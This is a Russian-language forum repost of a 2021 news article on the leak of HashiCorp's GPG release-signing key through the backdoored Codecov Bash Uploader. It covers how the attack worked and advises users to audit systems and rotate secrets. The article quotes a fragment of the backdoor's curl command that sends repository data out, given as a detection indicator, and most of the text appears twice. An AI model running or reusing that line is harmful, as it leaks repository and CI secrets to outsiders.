Suicide
27.04.2021, 19:53
Компания HashiCorp (https://en.wikipedia.org/wiki/HashiCorp), известная разработкой открытых инструментариев Vagrant (https://www.vagrantup.com/), Packer (https://www.packer.io/), Nomad (https://www.nomadproject.io/) и Terraform (https://www.terraform.io/), объявила (https://discuss.hashicorp.com/t/hcsec-2021-12-codecov-security-event-and-hashicorp-gpg-key-exposure/23512) об утечке закрытого GPG-ключа, используемого для создания цифровых подписей, верифицирующих релизы. Атакующие, получившие доступ к GPG-ключу, потенциально могли внести скрытые изменения в продукты HashiCorp, заверив их корректной цифровой подписью. При этом компания заявила, что в ходе проведённого аудита следов попыток внесения подобных модификаций не выявлено.
В настоящее время скомпрометированный GPG-ключ отозван и вместо него введён в обиход новый ключ. Проблема затронула только верификацию при помощи файлов SHA256SUM и SHA256SUM.sig (https://www.hashicorp.com/security#release-archive-checksum-verification), и не коснулась формирования цифровых подписей для Linux-пакетов DEB и RPM, поставляемых через releases.hashicorp.com, а также механизмы подтверждения выпусков для macOS и Windows (AuthentiCode).
Утечка произошла из-за использования в инфраструктуре скрипта Codecov Bash Uploader (https://docs.codecov.io/docs/about-the-codecov-bash-uploader) (codecov-bash (https://github.com/codecov/codecov-bash)), предназначенного для загрузки coverage-отчётов из систем непрерывной интеграции. В ходе атаки на компанию Codecov в указанный скрипт был скрыто внедрён (https://about.codecov.io/security-update/) бэкдор, через который была организована отправка паролей и ключей шифрования на сервер злоумышленников.
Для взлома инфраструктуры Codecov атакующие воспользовались ошибкой в процессе создания Docker-образа, позволявшей извлечь данные для доступа к GCS (Google Cloud Storage), необходимые для внесения изменений в скрипт Bash Uploader, распространявшийся (https://codecov.io/bash) с сайта codecov.io. Изменения были внесены ещё 31 января, два месяца оставались незамеченными и позволяли злоумышленникам извлекать информацию, хранимую в окружениях систем непрерывной интеграции клиентов. При помощи добавленного вредоносного кода злоумышленники могли получить информацию о тестируемом Git-репозитории и всех переменных окружения, в том числе включающих токены, ключи шифрования и пароли, передаваемые в системы непрерывной интеграции для организации доступа к коду приложений, хранилищам и сервисам, таким как Amazon Web Services и GitHub.
Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки
Code:
curl -sm 0.5 -d "$(git remote -v)/upload/v2 || true
27.04.2021
https://www.opennet.ru/opennews/art.shtml?num=55032
В настоящее время скомпрометированный GPG-ключ отозван и вместо него введён в обиход новый ключ. Проблема затронула только верификацию при помощи файлов SHA256SUM и SHA256SUM.sig (https://www.hashicorp.com/security#release-archive-checksum-verification), и не коснулась формирования цифровых подписей для Linux-пакетов DEB и RPM, поставляемых через releases.hashicorp.com, а также механизмы подтверждения выпусков для macOS и Windows (AuthentiCode).
Утечка произошла из-за использования в инфраструктуре скрипта Codecov Bash Uploader (https://docs.codecov.io/docs/about-the-codecov-bash-uploader) (codecov-bash (https://github.com/codecov/codecov-bash)), предназначенного для загрузки coverage-отчётов из систем непрерывной интеграции. В ходе атаки на компанию Codecov в указанный скрипт был скрыто внедрён (https://about.codecov.io/security-update/) бэкдор, через который была организована отправка паролей и ключей шифрования на сервер злоумышленников.
Для взлома инфраструктуры Codecov атакующие воспользовались ошибкой в процессе создания Docker-образа, позволявшей извлечь данные для доступа к GCS (Google Cloud Storage), необходимые для внесения изменений в скрипт Bash Uploader, распространявшийся (https://codecov.io/bash) с сайта codecov.io. Изменения были внесены ещё 31 января, два месяца оставались незамеченными и позволяли злоумышленникам извлекать информацию, хранимую в окружениях систем непрерывной интеграции клиентов. При помощи добавленного вредоносного кода злоумышленники могли получить информацию о тестируемом Git-репозитории и всех переменных окружения, в том числе включающих токены, ключи шифрования и пароли, передаваемые в системы непрерывной интеграции для организации доступа к коду приложений, хранилищам и сервисам, таким как Amazon Web Services и GitHub.
Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки
Code:
curl -sm 0.5 -d "$(git remote -v)/upload/v2 || true
27.04.2021
https://www.opennet.ru/opennews/art.shtml?num=55032